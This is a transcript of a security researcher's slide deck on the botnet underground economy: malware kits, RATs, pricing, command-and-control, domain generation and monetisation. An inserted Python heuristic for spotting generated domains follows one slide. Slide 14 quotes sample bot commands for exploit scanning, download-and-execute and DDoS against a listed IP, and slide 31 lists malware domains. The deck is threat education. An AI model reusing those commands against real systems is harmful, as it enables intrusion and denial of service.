Your computer is worth 30 cents - Gunter Ollmann



In case you haven’t noticed, there’s a war going on. Malware vendors, SEO consultants, exploit pack developers, content delivery specialists and botnet masters are battling for control of your computer. They’re not battling you or the security systems you’ve deployed – they won that war quite some time ago. No, they’re battling each other over who gets to own your computer – and consequently who gets to make money from it.

The botnet ecosystem is evolving at a rapid pace. Specialized services have come to fill every niche of the hacking world. The frontline is rarely the mechanical process of exploitation and infection – instead it lies with innovative 24x7 support and helpdesk ticketing systems – quality of service is the competitive edge. How much is your computer worth to them? The price point is dropping day-by-day, but 30 cents is a pretty average trade value. Why is it so low? Because your computer is only part of the ecosystem – and a commodity one at that.


Transcript

  • 1. Your Computer Is Worth 30¢ This battle for control of your Gunter Ollmann, Vice President of Research
  • 2. About  Gunter Ollmann • VP of Research, Damballa Inc.  Damballa Inc. • Atlanta-based security company focused on enterprise detection and mitigation of botnets  Brief Bio: • Two decades in the IT industry; built and run international pentest teams, R&D groups and consulting practices around the world. • Formerly Chief Security Strategist for IBM, Director of X-Force for ISS, Professional Services Director for NGS Software, Head of Attack Services EMEA, etc. • http://blog.damballa.com & http://technicalinfodotnet.blogspot.com/ Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
  • 3. Perspective…
  • 4. Targeted?  Targeted in what sense?
  • 5. Targeted Attacks?
  • 6. Access to the enterprise (2000 / 2005 / 2009): Submit a CV; Hand out USB drives; Purchase from botnet masters
  • 7. Different Ways of Looking at the Threat?
  • 8. Serial Variants  Original Malware • Source-code or DIY malware creator kit generates original code.  Code Metamorphism • Random changes to the code's structures and procedures.  Noise Insertion • Insertion of noise instructions and whitespace commands.  Compilers • Different compilers (and versions) are used to generate different code.
  • 9. Cryptors, Packers and Binders  Original Malware • Source-code or DIY malware creator kit generates original code.  Cryptors • Encrypt the malware, so it can only be decrypted in real-time on the host.  Packers • Compress the malware to make it small, compact and random.  Binders • Take the malware and bind it with(in) other innocuous software.  QA • Automatically run the new malware through AV detection tests.
  • 10. Avoiding analysis systems
  • 11. Virus Testing
  • 12. Bot spreading & Support
  • 13. Command & Control Evolution  Star Topology • Common clustering  Multi-server Topology • High resilience to shut-down  Hierarchical Topology • Easy to sell/rent branches  Random P2P, etc.
  • 14. Botnet Command and Control  IRC Command and Control is still common for botnet management  Command language varies with the nature of the botnet  Sample bot command sequence • Sdbot/Reptile capabilities: 1: scan.start ms08_067_netapi 25 3 download+exec x.x.x.x 2: .scan 75 1 201.x.x.x 2 1 201.x.x.x 3: .root.start lsass_445 100 3 0 -r –s …scan hosts within a Class-A for port 443 and attempt to exploit (Conficker) • Rbots: 1: .udp 208.43.216.195 1995 999999999999 –s 2: .ddos.ack 208.43.216.195 1995 9999999999999 –s …typically used for DDoS
  • 15. IRC CnC Host Controls: Agobot, SpyBot, SDbot
  • 16. Zeus & Distribution  ZEUS DIY Kit • RRP: $400 (street price ~$50) • Botnet CnC package with Web management frontend. • Very popular – many plug-ins developed to extend functionality
  • 17. Sophisticated Management
  • 18. Sophisticated Management
  • 19. Visibility…
  • 20. (screenshot slide)
  • 21. Keylogger Octopus  Basic DIY kit • Evolution of free kit (incl. source code) • $30 for commercial version
  • 22. RAT Spy-Net v1.8
  • 23. RAT Aero-Rat v0.3
  • 24. RAT Turkojan v4  Trojan creator  V.4 New features • Remote Desktop • Webcam Streaming • Audio Streaming • Remote passwords • MSN Sniffer • Remote Shell • Advanced File Manager • Online & Offline keylogger • Information about remote computer • Etc.  Three versions • Gold, Silver & Bronze
  • 25. RAT PayDay v0.1
  • 26. Hire-a-Malware-Coder (Custom Build) Platform: software running on MAC OS to Windows. Multitasking: have the capacity to work on multiple projects. Speed and responsibility: at the highest level. Pre-payment for new customers: 50% of the whole price, 30% pre-pay of the whole price for repeated customers. Rates: starting from 100 euros. I can also offer you another deal, I will share the complete source code in exchange for access to a botnet with at least 4000 infected hosts because I don't have time to play around with my bot right now.
  • 27. Hire-a-malware-coder Pricing  Other models exist for hire-a-malware-coder pricing  Component/functionality based pricing • Loader 300 • FTP & Grabber 150 • Assembler Spam bases 220 • Socks 4/5 70 • Botnet manager 600 • Scripts 70 • Password stealers (IE, MSN, etc.) 70 • AV-remover 70 • Screen-grabber 70
  • 28. Competition…
  • 29. Builder Battling  Zeus: World's most popular DIY malware construction kit  Helps clear your system before making the malware
  • 30. Battling at the Victim's Host  Similar kit to Zeus
  • 31. Dynamic Domain Generation  Designed to thwart domain hijacking/closure Sinowal fhwwhkis.com fhksvbjj.com Bobax/Torpig cfzxkefy.2mydns.net kixxgxhi.com Conficker A/B ozzlcjfwxy.mykgb.com dfhkxefj.biz uavpmphb.zipitover.com jstlzaccs.cc xchtucfx.com ehbcihsg.com nltngl.widescreenhd.tv kupgc.info Conficker C mohuajixthb.afraid.org gyagluso.info bjxqjh.com.sv htiukhwb.com vemogoftiv.zipitover.com ezffoozq.biz dgtqwe.be xddjsvgh.com fwsdqcxozwi.mycoding.com hxqbgkyw.org cnxnp.com.py ivfjxxgf.com iaguaku.afraid.org nxmezijg.info btuutlevt.com.mt icdkvcjf.com pxkakigmdx.mario.org sayklyqfhk.org bmjlezym.com.pe zxeytdqgn.mario.org eplgu.org bynzomen.com.mx hlgkiyogcgs.ws daagsup.com.bo oyvtk.cn cequxn.ca cxcsicbqn.ch dcmrfv.gs
  • 32. Blacklisted Researchers
  • 33. Hack-back  Curiosity killed the cat • Turn botnet against CnC investigators  Identifying the researcher • Repeated lookup of name servers • Resolution request for CnC host name • Wrong port/protocol in CnC connection • Missing handshake or keys • Identify sandbox/VM being used  Response tactics • DDoS the IP address or netblock • Spam flood the researcher • Exploit and break out of sandbox/VM • Give different (benign) responses to the researcher
  • 34. Value…
  • 35.  How to pay  Where to look  Mechanisms for validation of buyer/seller
  • 36. Making Money With Botnets  Business Motivators for Bot Masters • Active market for purchase/sale of corporate hosts • $500-$20,000 per host • Markets for the data stolen from botnet hosts • Authentication credentials and PII • Buying/selling stolen documents • Blackhat services • Noisy, high-volume, low profit: Spam, DDoS, brute-force • Stealthy: click-fraud, corporate identity enumeration • Reputation hijacking • Running blackhat services that leverage corporate reputation
  • 37. Buying Botnet Victims
  • 38. Worth less than you imagine  How much? 1/400th of a cent per 24 hours
  • 39. Value-added Services
  • 40. (screenshot slide)
  • 41. iFrame Traffic
  • 42. (screenshot slide)
  • 43. URL Management
  • 44. Lookup Resilience  IP Flux • Single-flux • Double-flux  Domain Flux • Domain wildcarding • Domain generation algorithms
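Slides 31 and 44 show why domain generation algorithms are used (a sinkhole or takedown of one name does not cost the botmaster the CnC channel) and list the kind of names they produce. The following is an added example, not part of the deck or Damballa's tooling: a lexical triage of the leftmost DNS label that flags generated-looking names by vowel ratio and longest consonant run, run over a few of the slide's own Sinowal/Conficker domains beside constructed benign ones; the thresholds and the sample list are assumptions for illustration.

```python
import re

# Constructed sample input: generated-looking names taken from slide 31,
# plus a few ordinary domains so the heuristic has something to leave alone.
SAMPLE_DOMAINS = [
    "fhwwhkis.com", "fhksvbjj.com", "ozzlcjfwxy.mykgb.com", "xchtucfx.com",
    "htiukhwb.com", "nltngl.widescreenhd.tv",
    "google.com", "damballa.com", "wikipedia.org", "microsoft.com",
]

VOWELS = set("aeiou")
CONSONANT_RUN = re.compile(r"[b-df-hj-np-tv-z]+")  # 'y' deliberately excluded


def generated_label(fqdn):
    """The leftmost label is the part a DGA produces (e.g. 'ozzlcjfwxy' in
    ozzlcjfwxy.mykgb.com); everything to its right is a fixed suffix the
    botmaster registered or borrowed from a dynamic-DNS provider."""
    return fqdn.lower().strip(".").split(".")[0]


def vowel_ratio(label):
    """Fraction of alphabetic characters that are vowels; English-like
    labels sit around 0.3-0.5, random consonant soup much lower."""
    letters = [c for c in label if c.isalpha()]
    if not letters:
        return 0.0
    return sum(c in VOWELS for c in letters) / len(letters)


def longest_consonant_run(label):
    """Length of the longest unbroken consonant sequence in the label."""
    return max((len(r) for r in CONSONANT_RUN.findall(label)), default=0)


def looks_generated(fqdn, min_vowel_ratio=0.25, max_consonant_run=3):
    """Assumed thresholds: flag a name whose leftmost label is vowel-poor
    or contains a consonant run longer than 3 characters."""
    label = generated_label(fqdn)
    return (vowel_ratio(label) < min_vowel_ratio
            or longest_consonant_run(label) > max_consonant_run)


def triage(domains):
    """Map each domain to True (generated-looking) or False."""
    return {d: looks_generated(d) for d in domains}


if __name__ == "__main__":
    for d, flagged in triage(SAMPLE_DOMAINS).items():
        lbl = generated_label(d)
        print(f"{'DGA?' if flagged else 'ok  '} {d:26s} "
              f"vowels={vowel_ratio(lbl):.2f} run={longest_consonant_run(lbl)}")
```

Lexical scoring alone misfires on short brand names and CDN hostnames, so in practice it is combined with the per-client NXDOMAIN rate: a host that resolves dozens of such names and gets NXDOMAIN for nearly all of them is the stronger signal.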
  • 45. (screenshot slide)
  • 46. Umm…
  • 47. Conclusions
  • 48. Thank You! Gunter Ollmann - VP of Research gollmann@damballa.com WWW – http://www.damballa.com Blog - http://blog.damballa.com Blog - http://technicalinfodotnet.blogspot.com